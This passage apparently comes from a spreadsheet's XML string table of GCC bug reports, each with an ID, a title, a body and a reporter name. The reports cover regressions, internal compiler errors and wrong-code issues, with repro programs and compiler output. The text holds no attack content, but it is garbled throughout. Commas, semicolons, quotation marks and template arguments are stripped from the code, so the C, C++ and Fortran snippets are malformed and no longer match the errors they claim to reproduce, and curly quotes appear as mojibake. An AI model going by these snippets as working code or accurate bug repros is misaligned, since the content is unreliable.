./index0-out.go:113: t.sqb[i64bigger:] did not panic
./index0-out.go:113: t.sqb[ni64bigger] did not panic
./index0-out.go:113: t.sqb[ni64bigger:] did not panic
./index0-out.go:113: t.sqb[nhuge] did not panic
./index0-out.go:113: t.sqb[nhuge:] did not panic
./index0-out.go:113: pt.ai[i64bigger] did not panic
./index0-out.go:113: pt.ai[i64bigger:] did not panic
./index0-out.go:113: pt.ai[ni64bigger] did not panic
./index0-out.go:113: pt.ai[ni64bigger:] did not panic
./index0-out.go:113: pt.ai[nhuge] did not panic
./index0-out.go:113: pt.ai[nhuge:] did not panic
./index0-out.go:113: pt.aib[i64bigger] did not panic
./index0-out.go:113: pt.aib[i64bigger:] did not panic
./index0-out.go:113: pt.aib[ni64bigger] did not panic
./index0-out.go:113: pt.aib[ni64bigger:] did not panic
./index0-out.go:113: pt.aib[nhuge] did not panic
./index0-out.go:113: pt.aib[nhuge:] did not panic
./index0-out.go:113: pt.aq[i64bigger] did not panic
./index0-out.go:113: pt.aq[i64bigger:] did not panic
./index0-out.go:113: pt.aq[ni64bigger] did not panic
./index0-out.go:113: pt.aq[ni64bigger:] did not panic
./index0-out.go:113: pt.aq[nhuge] did not panic
./index0-out.go:113: pt.aq[nhuge:] did not panic
./index0-out.go:113: pt.aqb[i64bigger] did not panic
./index0-out.go:113: pt.aqb[i64bigger:] did not panic
./index0-out.go:113: pt.aqb[ni64bigger] did not panic
./index0-out.go:113: pt.aqb[ni64bigger:] did not panic
./index0-out.go:113: pt.aqb[nhuge] did not panic
./index0-out.go:113: pt.aqb[nhuge:] did not panic
./index0-out.go:113: pt.pai[i64bigger] did not panic
./index0-out.go:113: pt.pai[i64bigger:] did not panic
./index0-out.go:113: pt.pai[ni64bigger] did not panic
./index0-out.go:113: pt.pai[ni64bigger:] did not panic
./index0-out.go:113: pt.pai[nhuge] did not panic
./index0-out.go:113: pt.pai[nhuge:] did not panic
./index0-out.go:113: pt.paib[i64bigger] did not panic
./index0-out.go:113: pt.paib[i64bigger:] did not panic
./index0-out.go:113: pt.paib[ni64bigger] did not panic
./index0-out.go:113: pt.paib[ni64bigger:] did not panic
./index0-out.go:113: pt.paib[nhuge] did not panic
./index0-out.go:113: pt.paib[nhuge:] did not panic
./index0-out.go:113: pt.paq[i64bigger] did not panic
./index0-out.go:113: pt.paq[i64bigger:] did not panic
./index0-out.go:113: pt.paq[ni64bigger] did not panic
./index0-out.go:113: pt.paq[ni64bigger:] did not panic
./index0-out.go:113: pt.paq[nhuge] did not panic
./index0-out.go:113: pt.paq[nhuge:] did not panic
./index0-out.go:113: pt.paqb[i64bigger] did not panic
./index0-out.go:113: pt.paqb[i64bigger:] did not panic
./index0-out.go:113: pt.paqb[ni64bigger] did not panic
./index0-out.go:113: pt.paqb[ni64bigger:] did not panic
./index0-out.go:113: pt.paqb[nhuge] did not panic
./index0-out.go:113: pt.paqb[nhuge:] did not panic
./index0-out.go:113: pt.si[i64bigger] did not panic
./index0-out.go:113: pt.si[i64bigger:] did not panic
./index0-out.go:113: pt.si[ni64bigger] did not panic
./index0-out.go:113: pt.si[ni64bigger:] did not panic
./index0-out.go:113: pt.si[nhuge] did not panic
./index0-out.go:113: pt.si[nhuge:] did not panic
./index0-out.go:113: pt.sib[i64bigger] did not panic
./index0-out.go:113: pt.sib[i64bigger:] did not panic
./index0-out.go:113: pt.sib[ni64bigger] did not panic
./index0-out.go:113: pt.sib[ni64bigger:] did not panic
./index0-out.go:113: pt.sib[nhuge] did not panic
./index0-out.go:113: pt.sib[nhuge:] did not panic
./index0-out.go:113: pt.sq[i64bigger] did not panic
./index0-out.go:113: pt.sq[i64bigger:] did not panic
./index0-out.go:113: pt.sq[ni64bigger] did not panic
./index0-out.go:113: pt.sq[ni64bigger:] did not panic
./index0-out.go:113: pt.sq[nhuge] did not panic
./index0-out.go:113: pt.sq[nhuge:] did not panic
./index0-out.go:113: pt.sqb[i64bigger] did not panic
./index0-out.go:113: pt.sqb[i64bigger:] did not panic
./index0-out.go:113: pt.sqb[ni64bigger] did not panic
./index0-out.go:113: pt.sqb[ni64bigger:] did not panic
./index0-out.go:113: pt.sqb[nhuge] did not panic
./index0-out.go:113: pt.sqb[nhuge:] did not panic
FAIL: ./index0-out.go execution  -O0 -g -fno-var-tracking-assignments 
The test works ok on 64bit x86_64 targets.</t>
  </si>
  <si>
    <t>GCC-71225</t>
  </si>
  <si>
    <t>[7 Regression] Overeager instantiation of members of non-template class nested in class template</t>
  </si>
  <si>
    <t>Created attachment 38540
Repro
r236559 fails to compile this TU:
namespace std {
    template  struct enable_if
}
template 
struct BidirectionalRange
template
struct stride_view
{
    struct adaptor
    {
        template&lt;int _c_11 = 42 typename std::enable_if&lt;
            _c_11 == 43 || BidirectionalRange() int&gt;::type = 0&gt;
        void clean() const
        {}
        template&lt;int _c_14 = 42 typename std::enable_if&lt;
            _c_14 == 43 || !BidirectionalRange() int&gt;::type = 0&gt;
        void clean() const
        {}
        void advance()
        {
            clean()
        }
    }
}
with diagnostics:
$ ~/gcc-r236559/bin/g++ repro2.cpp -c
repro2.cpp: In member function â€˜void stride_view::adaptor::advance()â€™:
repro2.cpp:23:19: error: call of overloaded â€˜clean()â€™ is ambiguous
             clean()
                   ^
repro2.cpp:15:14: note: candidate: void stride_view::adaptor::clean() const [with int _c_11 = 42 typename std::enable_if()) int&gt;::type  = 0 Rng = Rng]
         void clean() const
              ^~~~~
repro2.cpp:19:14: note: candidate: void stride_view::adaptor::clean() const [with int _c_14 = 42 typename std::enable_if())) int&gt;::type  = 0 Rng = Rng]
         void clean() const
              ^~~~~
This is a regression from the behavior of about a week ago.</t>
  </si>
  <si>
    <t>GCC-22028</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE after invalid struct declaration</t>
  </si>
  <si>
    <t>falk@juist:/tmp% cat bug.c &amp;&amp; gcc -c bug.c
int f(){
    struct { int i[] } u
}
bug.c: In function 'f':
bug.c:2: error: flexible array member in otherwise empty struct
bug.c:2: internal compiler error: tree check: expected class 'type' have
'exceptional' (error_mark) in gimplify_type_sizes at gimplify.c:4491
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-26180</t>
  </si>
  <si>
    <t>[4.1 Regression] wrong code due to VRP and unsigned multiplies with wraps</t>
  </si>
  <si>
    <t>/*
% gcc -v
Using built-in specs.
Target: i386-pc-solaris2.9
Configured with: /usr/local/gcc-4.0.2/src/gcc-4.0.2/configure
--enable-languages=c --with-gnu-as
--with-as=/usr/local/binutils-2.16.1/x86-SunOS-gcc-4.0.1/bin/as
--with-gnu-ld
--with-ld=/usr/local/binutils-2.16.1/x86-SunOS-gcc-4.0.1/bin/ld
--prefix=/usr/local/gcc-4.0.2/x86-SunOS-gnu-as-ld
Thread model: posix
gcc version 4.0.2
%
% gcc -O0 -o foo foo.c
% foo
z= 1
%
% gcc -O2 -o foo foo.c
% foo
z= 1
%
%
% gcc-4.1 -v
Using built-in specs.
Target: i386-pc-solaris2.9
Configured with: /home/kate/gcc-4.1-20060203/src/gcc-4.1-20060203/configure
--enable-languages=c --with-gnu-as
--with-as=/usr/local/binutils-2.16.1/x86-SunOS-gcc-4.0.1/bin/as
--with-gnu-ld
--with-ld=/usr/local/binutils-2.16.1/x86-SunOS-gcc-4.0.1/bin/ld
--prefix=/home/kate/gcc-4.1-20060203/x86-SunOS-gnu-as-ld
Thread model: posix
gcc version 4.1.0 20060203 (prerelease)
%
%
% gcc-4.1 -O0 -o foo foo.c
z = 1
%
% gcc-4.1 -O2 -o foo foo.c
z = -1
%
*/
#include 
int bar(x y)
int x y
{
    int x1 y1
    int x2 y2
    unsigned int x3 y3 w
    int z
    x1 = (x &lt; (1 &lt;&lt; 30))
    y1 = (y &lt; (1 &lt;&lt; 30))
    if (x1 &amp;&amp; y1) {
        x2 = ((x &gt; 0)? (x): -(x))
        y2 = ((y &gt; 0)? (y): -(y))
        x3 = x2
        y3 = y2
        w = x3 * y3
        if (w &gt;= (1 &lt;&lt; 30)) {
          z = 1
        } else    {
          z = -1
        }
    }
        return z
}
int main()
{
  int x y z
  x = 536870912  /* 2^29 */
  y = 2
  z = bar(x y)
printf(z= %d\n z)
}</t>
  </si>
  <si>
    <t>kate01123</t>
  </si>
  <si>
    <t>GCC-30881</t>
  </si>
  <si>
    <t>Select case of  case(transfer(...)) wrongly rejected</t>
  </si>
  <si>
    <t>With recent trunk gfortran incorrectly generates an error for the following standard code:
INTEGER PARAMETER :: K=1
INTEGER ::  I
I=TRANSFER(.TRUE.K)
SELECT CASE(I)
CASE(TRANSFER(.TRUE.K))
CASE(TRANSFER(.FALSE.K))
 CALL ABORT()
CASE DEFAULT
 CALL ABORT()
END SELECT
I=TRANSFER(.FALSE.K)
SELECT CASE(I)
CASE(TRANSFER(.TRUE.K))
 CALL ABORT()
CASE(TRANSFER(.FALSE.K))
CASE DEFAULT
 CALL ABORT()
END SELECT
END</t>
  </si>
  <si>
    <t>GCC-43937</t>
  </si>
  <si>
    <t>[4.6 regression] FAIL: gcc.dg/guality/inline-params.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 158843 gave:
FAIL: gcc.dg/guality/inline-params.c  -O1  execution test
Revision 158835 is OK</t>
  </si>
  <si>
    <t>GCC-64688</t>
  </si>
  <si>
    <t>[4.9 Regression] internal compiler error: Max. number of generated reload insns per insn is achieved (90)</t>
  </si>
  <si>
    <t>Running the Boost testsuite on gcc20 gives:
trippels@gcc20 more % cat performance.ii
template  struct A { typedef typename T::next type }
template  struct B
template  struct N : T {}
template  struct C {
  static const int value = N
  typedef C next
}
template 
struct R : N::template P&gt; {}
template  struct O : Base {
  typedef typename A::type size
}
template  struct D {
  typedef int tag
  typedef C size
}
template  struct B {
  template  struct P : O&gt;&gt;&gt;::size {}
}
template  struct F
template  struct G
template  struct H
template  struct H {}
template  unsigned char at_c(H) {}
template  class I
template  class J
template  class K
template  struct Q
struct L {
  typedef Q&gt;&gt;&gt;&gt;&gt; *type
}
template  struct M { typedef K&gt;&gt; view_t }
template 
struct Q : H R&gt;&gt;&gt;&gt;::value&gt; {}
template  struct G&gt; { typedef Iterator type }
template  class J {
public:
  typedef G *&gt;&gt;::type x_iterator
}
template  class K {
public:
  J::x_iterator row_begin(int)
}
template  void measure_time(Op p1) { p1() }
template  struct fill_nongil_t
template 
struct fill_nongil_t&gt;&gt;&gt;&gt;&gt; *&gt;&gt;&gt; P&gt; {
  typedef K&gt;&gt;&gt;&gt;&gt; *&gt;&gt;&gt; View
  View _v
  P _p
  fill_nongil_t(View P)
  void operator()() {
    T *first = (T *)_v.row_begin(0)
    T last
    while (first != &amp;last) {
      first[0] = first[1] = at_c(_p)
      first[2] = at_c(_p)
      first += 3
    }
  }
}
template  void test_fill(int) {
  M::view_t __trans_tmp_1
  measure_time(fill_nongil_t&gt;&gt;&gt;&gt;&gt; *&gt;&gt;&gt;
                             Q&gt;&gt;&gt;&gt;&gt;&gt;(
      __trans_tmp_1 Q&gt;&gt;&gt;&gt;&gt;()))
}
void performance_testtest_method() { test_fill Q&gt;(0) }
trippels@gcc20 more % g++ -c -O3 -std=c++11 -march=westmere performance.ii
performance.ii: In function â€˜void performance_testtest_method()â€™:
performance.ii:68:78: internal compiler error: Max. number of generated reload insns per insn is achieved (90)
 void performance_testtest_method() { test_fill Q&gt;(0) }
                                                                              ^
0xb8eb70 lra_constraints(bool)
        ../../gcc/gcc/lra-constraints.c:4335
0xb7b3a1 lra(_IO_FILE*)
        ../../gcc/gcc/lra.c:2292
0xb39809 do_reload
        ../../gcc/gcc/ira.c:5418
0xb39809 execute
        ../../gcc/gcc/ira.c:5589
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug re</t>
  </si>
  <si>
    <t>GCC-38380</t>
  </si>
  <si>
    <t>explicitly defaulted constructors vs. empty direct initialization</t>
  </si>
  <si>
    <t>Another C++0x default issue with Last Changed Rev: 142359
// { dg-options -std=gnu++0x }
namespace std
{
 struct atomic_bool
  {
    bool _M_i
    atomic_bool() = default
    ~atomic_bool() = default
    atomic_bool(const atomic_bool
    atomic_bool
    atomic_bool(bool __i) { _M_i = __i }
    operator bool() const volatile
    { return true }
  }
}
namespace __gnu_test
{
  struct direct_list_initializable
  {
    template
      void 
      operator()()
      {
	struct _Concept
	{
	  void __constraint()
	  { 
	    _Ttype __v1 { } // default ctor
	    _Ttype __v2 { __a }  // single-argument ctor
	  }
	  _Tvalue __a
	}
	void (_Concept::*__x)() __attribute__((unused))
	  = 
      }
  }
}
int main()
{
  __gnu_test::direct_list_initializable test
  test.operator()()
  return 0
}
Gives:
%/mnt/share/bld/gcc/./gcc/g++ -shared-libgcc -B/mnt/share/bld/gcc/./gcc -nostdinc++ -L/mnt/share/bld/gcc/x86_64-unknown-linux-gnu/libstdc++-v3/src -L/mnt/share/bld/gcc/x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/mnt/share/bld/H-x86-gcc/x86_64-unknown-linux-gnu/bin/ -B/mnt/share/bld/H-x86-gcc/x86_64-unknown-linux-gnu/lib/ -isystem /mnt/share/bld/H-x86-gcc/x86_64-unknown-linux-gnu/include -isystem /mnt/share/bld/H-x86-gcc/x86_64-unknown-linux-gnu/sys-include -g -O2 -D_GLIBCXX_ASSERT -fmessage-length=0 -ffunction-sections -fdata-sections -g -O2 -D_GNU_SOURCE -g -O2 -D_GNU_SOURCE -DLOCALEDIR=. -nostdinc++ -I/mnt/share/bld/gcc/x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/mnt/share/bld/gcc/x86_64-unknown-linux-gnu/libstdc++-v3/include -I/mnt/share/src/gcc/libstdc++-v3/libsupc++ -I/mnt/share/src/gcc/libstdc++-v3/include/backward -I/mnt/share/src/gcc/libstdc++-v3/testsuite/util -Wl--gc-sections /mnt/share/src/gcc/libstdc++-v3/testsuite/29_atomics/atomic_integral/cons/direct_list_2.cc -std=gnu++0x ./libtestc++.a -lm -o ./direct_list.exe -Wfatal-errors
/mnt/share/src/gcc/libstdc++-v3/testsuite/29_atomics/atomic_integral/cons/direct_list_2.cc: In member function 'void __gnu_test::direct_list_initializable::operator()()::_Concept::__constraint() [with _Ttype = std::atomic_bool _Tvalue = bool]':
/mnt/share/src/gcc/libstdc++-v3/testsuite/29_atomics/atomic_integral/cons/direct_list_2.cc:76:   instantiated from 'void __gnu_test::direct_list_initializable::operator()() [with _Ttype = std::atomic_bool _Tvalue = bool]'
/mnt/share/src/gcc/libstdc++-v3/testsuite/29_atomics/atomic_integral/cons/direct_list_2.cc:86:   instantiated from here
/mnt/share/src/gcc/libstdc++-v3/testsuite/29_atomics/atomic_integral/cons/direct_list_2.cc:68: error: converting to 'const std::atomic_bool' from initializer list would use explicit constructor 'std::atomic_bool::atomic_bool()'
compilation terminated due to -Wfatal-errors.
It's the would use explicit constructor bits that are confusing since there is only an explicitly defaulted constructor. 
Also this message should say something about using the default constructor to create the members of the initialization list.</t>
  </si>
  <si>
    <t>GCC-2646</t>
  </si>
  <si>
    <t>Invalid warning message</t>
  </si>
  <si>
    <t>gcc gives this warning:
test.cc:5:27: warning: trigraph ??! ignored
whenever it sees a string that contains the characters ??!
the command line I used is:
gcc -Wall -g test.cc -o test
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
Environment:
Standard RedHat 7.1 on x86. It's out of the box.
How-To-Repeat:
#include 
int main(void)
{
    printf(??!!!\r\n)
    return 1
}</t>
  </si>
  <si>
    <t>lenon</t>
  </si>
  <si>
    <t>GCC-41780</t>
  </si>
  <si>
    <t>File gcc/config/arm/lib1funcs.asm broken for THUMB version 1 since r150545</t>
  </si>
  <si>
    <t>I suppose the file gcc/config/arm/lib1funcs.asm does not work when compiled for THUMB version 1 with an architecture other than __ARM_ARCH_6M__ since r150545.  I got a link error:
/opt/rtems-4.10-gcc/bin/../lib/gcc/arm-rtems4.10/4.5.0/../../../../arm-rtems4.10/bin/ld: /opt/rtems-4.10-gcc/bin/../lib/gcc/arm-rtems4.10/4.5.0/thumb/soft/libgcc.a(_dvmd_tls.o)(__div0): warning: interworking not enabled.
  first occurrence: /opt/rtems-4.10-gcc/bin/../lib/gcc/arm-rtems4.10/4.5.0/thumb/soft/libgcc.a(_udivsi3.o): arm call to thumb</t>
  </si>
  <si>
    <t>GCC-45232</t>
  </si>
  <si>
    <t>[4.6 regression] tree reassociation introduces undefined overflow</t>
  </si>
  <si>
    <t>Fold:
extern void abort (void)
int i = 1
int main()
{
 if ((i - 1) - (-__INT_MAX__ - 1) != (-__INT_MAX__ - 1))
   abort ()
 return 0
}
Forwprop (and reassoc with -fno-tree-forwprop) at -O1:
extern void abort (void)
int i = 1
int main()
{
 int j = i - 1
 j = j - (-__INT_MAX__ - 1)
 if (j != (-__INT_MAX__ - 1))
   abort ()
 return 0
}
Not so VRP itself (it doesn't derive ranges from VARYING +- CST for
signed arithmetic).</t>
  </si>
  <si>
    <t>GCC-32422</t>
  </si>
  <si>
    <t>Problem reading floats with exponent marker but no exponent</t>
  </si>
  <si>
    <t>When reading malformed floats like 3.14e using operator&gt;&gt; it appears like the e character is removed from the input stream but the fact that the stream state does not signal that something went wrong.
$ cat lcast.cpp
#include 
#include 
using namespace std
int main()
{
    stringstream buf
    buf.str(1e)
    float r
    buf &gt;&gt; r
    cout &lt;&lt; float== &lt;&lt; r &lt;&lt; endl
    cout &lt;&lt; tellg()== &lt;&lt; buf.tellg() &lt;&lt; endl
    cout &lt;&lt; fail()== &lt;&lt; buf.fail() &lt;&lt; endl
}
$ g++ lcast.cpp  &amp;&amp;  ./a.out
float==1
tellg()==2
fail()==0
This was noticed in the context of the boost library. There boost::lexical_cast(1e) silently return 1.0 which is surprising. E.g. a compiler would reject float x = 1e saying exponent has no digits or something along these lines.</t>
  </si>
  <si>
    <t>GCC-64776</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: gcc.dg/ipa/pr64307.c (internal compiler error) on x86_64-apple-darwin14</t>
  </si>
  <si>
    <t>Compiling the test gcc.dg/ipa/pr64307.c on x86_64-apple-darwin14 gives the following ICE
[Book15] f90/bug% gcc5 -S -O0 -fipa-icf /opt/gcc/_clean/gcc/testsuite/gcc.dg/ipa/pr64307.c
/opt/gcc/_clean/gcc/testsuite/gcc.dg/ipa/pr64307.c: In function 'real_part':
/opt/gcc/_clean/gcc/testsuite/gcc.dg/ipa/pr64307.c:28:1: error: invalid argument to gimple call
 }
 ^
a
# .MEM_2 = VDEF 
retval.0_3 = real_part_2 (a) [tail call]
/opt/gcc/_clean/gcc/testsuite/gcc.dg/ipa/pr64307.c:28:1: internal compiler error: verify_gimple failed
The code compiles if gcc is configured with --enable-checking=release.</t>
  </si>
  <si>
    <t>GCC-50744</t>
  </si>
  <si>
    <t>[4.7 Regression] ice in good_cloning_opportunity_p</t>
  </si>
  <si>
    <t>Created attachment 25514
C++ source code
I just tried to compile the package polyml-5.4.1-1
on latest trunk snapshot 20111015 on an AMD x86_64 box.
The compiler said
foreign.cpp: At global scope:
foreign.cpp:1919:1: internal compiler error: in good_cloning_opportunity_p at ipa-cp.c:1228
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flag -O3 required.</t>
  </si>
  <si>
    <t>GCC-49896</t>
  </si>
  <si>
    <t>undefined reference to static const integral member whose address is not used for some values of the constant</t>
  </si>
  <si>
    <t>A static const int member is declared and initialized in a template class.
Its value (not its address) is used in a method of the class.
If the value of the constant has its most significant bit set (int is 32 bits) then there is an undefined reference to the member at link.
Here is a code snippet to reproduce this:
&gt;&gt;&gt; snippet test.cpp &gt;&gt;&gt;
template
class test {
 protected:
  static const int version = 0x80000000
  //static const int version = 0x0fffffff
 public:
  int getVersion()
}
template
int test::getVersion() {
  return version
}
class dummy_class {}
int main() {
  test t
  return t.getVersion()
}
&lt;&lt;&lt; end of snippet &lt;&lt;&lt;
compilation:
$ gcc -Wall -Wextra -Wstrict-aliasing test2.cpp
/tmp/cc4duaE3.o: In function `test::getVersion()':
test2.cpp:(.text._ZN4testI11dummy_classE10getVersionEv[test::getVersion()]+0xa): undefined reference to `test::version'
collect2: ld returned 1 exit status
if the constant value is 0x0fffffff instead of 0x80000000 it compiles fine.
i get this issue on this version of gcc (the default version currently on debian testing):
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.1-4' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --with-multiarch-defaults=x86_64-linux-gnu --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib/x86_64-linux-gnu --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib/x86_64-linux-gnu --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.1 (Debian 4.6.1-4)
I checked with gcc 4.5.3-3 and i don't have the link error.</t>
  </si>
  <si>
    <t>matthieu.imbert</t>
  </si>
  <si>
    <t>GCC-2241</t>
  </si>
  <si>
    <t>/opt/qt/include/qpointarray.h: In method `QPointArray::QPointArray(int)':
/opt/qt/include/qpointarray.h:56: Internal compiler error.
/opt/qt/include/qpointarray.h:56: Please submit a full bug report.
/opt/qt/include/qpointarray.h:56: See  for instructions.
This error message is got while running make the first time. When make is run a 2nd time this error doesnot occur any more.
Release:
unknown
Environment:
redhat-6.2 linux kernel-2.2.17-14 gcc-2.95.2 compiled from sources (not a cross-compiler)</t>
  </si>
  <si>
    <t>ndeb</t>
  </si>
  <si>
    <t>GCC-45860</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: verify_ssa failed: virtual SSA name for non-VOP decl at -O1</t>
  </si>
  <si>
    <t>Created attachment 21937
reduced testcase
Might be related to PR45732
Compiler output:
$ gcc -O pr45860.c 
pr45860.c: In function 'foo':
pr45860.c:2:1: error: virtual SSA name for non-VOP decl
while verifying SSA_NAME cstore.1_7 in statement
# .MEM_13 = VDEF 
    cstore.1_7 = MEM[(char * {ref-all})D.2686_4]
pr45860.c:2:1: error: virtual SSA name for non-VOP decl
while verifying SSA_NAME cstore.1_8 in statement
cstore.1_8 = PHI 
pr45860.c:2:1: error: virtual SSA name for non-VOP decl
pr45860.c:2:1: error: missing definition
for SSA_NAME: cstore.1_7 in statement:
cstore.1_8 = PHI 
PHI argument
cstore.1_7
for PHI node
cstore.1_8 = PHI 
pr45860.c:2:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r164716 - crash
r163636 - OK</t>
  </si>
  <si>
    <t>GCC-1750</t>
  </si>
  <si>
    <t>suprrious warning when using memset</t>
  </si>
  <si>
    <t>/* repeat by:
   gcc -c -g -O  -Wpointer-arith  gcc-bug-memset.c */
/* gcc -v says:
Reading specs from /home/jdeifik/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/specs
gcc version 2.95.2 19991024 (release) */
#include 
void foo(void) 
{
    char a[10] b[10]
    memset(a 3 1)
}
generates:
In file included from /usr/include/string.h:346
                 from gcc-bug-memset.c:8:
/usr/include/bits/string2.h: In function `__strcpy_small':
/usr/include/bits/string2.h:419: warning: pointer of type `void *' used in arithmetic
/usr/include/bits/string2.h:427: warning: pointer of type `void *' used in arithmetic
/usr/include/bits/string2.h:432: warning: pointer of type `void *' used in arithmetic
/usr/include/bits/string2.h:437: warning: pointer of type `void *' used in arithmetic
/usr/include/bits/string2.h:439: warning: pointer of type `void *' used in arithmetic
/usr/include/bits/string2.h:444: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c: In function `foo':
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
gcc-bug-memset.c:14: warning: pointer of type `void *' used in arithmetic
Release:
gcc version 2.95.2 19991024
Environment:
redhat linux 6.2
How-To-Repeat:
gcc -c -g -O  -Wpointer-arith  gcc-bug-memset.c</t>
  </si>
  <si>
    <t>jdeifik</t>
  </si>
  <si>
    <t>GCC-39401</t>
  </si>
  <si>
    <t>Reproducible internal compiler error for FFmpeg/h264.c multiple platforms</t>
  </si>
  <si>
    <t>Yay! A reproducible gcc compiler error that occurs on multiple platforms at the same place.
I periodically upgrade gcc-svn for a number of platforms and continuously test FFmpeg ( http://ffmpeg.org/ ) on a large number of configurations. I recently upgraded from 144120 built 2009-02-11 to 144657 built 2009-03-05. That's when the compilation failed on an unfortunately very large file. However it's very repeatable.
Note that this occurs identically on both x86_64-unknown-linux-gnu and powerpc-unknown-linux-gnu. These are the only I have tested right now but it's reasonable that the problem occurs on other targets.
Command line:
/home/fate/cc/64/gcc-144657-20090305/bin/gcc -DHAVE_AV_CONFIG_H -I. -I/home/fate/ffmpeg -D_ISOC99_SOURCE -D_POSIX_C_SOURCE=200112 -save-temps -std=c99 -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -fomit-frame-pointer -g -Wdeclaration-after-statement -Wall -Wno-switch -Wdisabled-optimization -Wpointer-arith -Wredundant-decls -Wno-pointer-sign -Wcast-qual -Wwrite-strings -Wtype-limits -Wundef -O3 -fno-math-errno -fno-signed-zeros        -c -o libavcodec/h264.o /home/fate/ffmpeg/libavcodec/h264.c
The stderr output is:
In file included from /home/fate/ffmpeg/libavcodec/h264.c:43:
/home/fate/ffmpeg/libavcodec/x86/h264_i386.h: In function â€˜decode_significance_x86â€™:
/home/fate/ffmpeg/libavcodec/x86/h264_i386.h:41: warning: cast from pointer to integer of different size
/home/fate/ffmpeg/libavcodec/x86/h264_i386.h:42: warning: cast from pointer to integer of different size
In file included from /home/fate/ffmpeg/libavcodec/h264.c:43:
/home/fate/ffmpeg/libavcodec/x86/h264_i386.h: In function â€˜decode_significance_8x8_x86â€™:
/home/fate/ffmpeg/libavcodec/x86/h264_i386.h:94: warning: cast from pointer to integer of different size
/home/fate/ffmpeg/libavcodec/h264.c: In function â€˜pred_direct_motionâ€™:
/home/fate/ffmpeg/libavcodec/h264.c:1046: warning: assignment from incompatible pointer type
/home/fate/ffmpeg/libavcodec/h264.c:1047: warning: assignment from incompatible pointer type
/home/fate/ffmpeg/libavcodec/h264.c: In function â€˜get_dct8x8_allowedâ€™:
/home/fate/ffmpeg/libavcodec/h264.c:4120: warning: dereferencing type-punned pointer will break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:4122: warning: dereferencing type-punned pointer will break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c: In function â€˜filter_mb_dirâ€™:
/home/fate/ffmpeg/libavcodec/h264.c:6283: warning: initialization from incompatible pointer type
/home/fate/ffmpeg/libavcodec/h264.c:6284: warning: initialization from incompatible pointer type
In file included from /home/fate/ffmpeg/libavcodec/h264.c:8139:
/home/fate/ffmpeg/libavcodec/svq3.c: In function â€˜svq3_decode_slice_headerâ€™:
/home/fate/ffmpeg/libavcodec/svq3.c:721: warning: cast discards qualifiers from pointer target type
/home/fate/ffmpeg/libavcodec/svq3.c:724: warning: cast discards qualifiers from pointer target type
/home/fate/ffmpeg/libavcodec/h264.c: In function â€˜filter_mb_fastâ€™:
/home/fate/ffmpeg/libavcodec/h264.c:6267: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6266: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6265: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6264: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6260: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6259: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6256: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6243: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6230: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6230: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6230: warning: dereferencing pointer â€˜bSvâ€™ does break strict-aliasing rules
/home/fate/ffmpeg/libavcodec/h264.c:6226: note: initialized from here
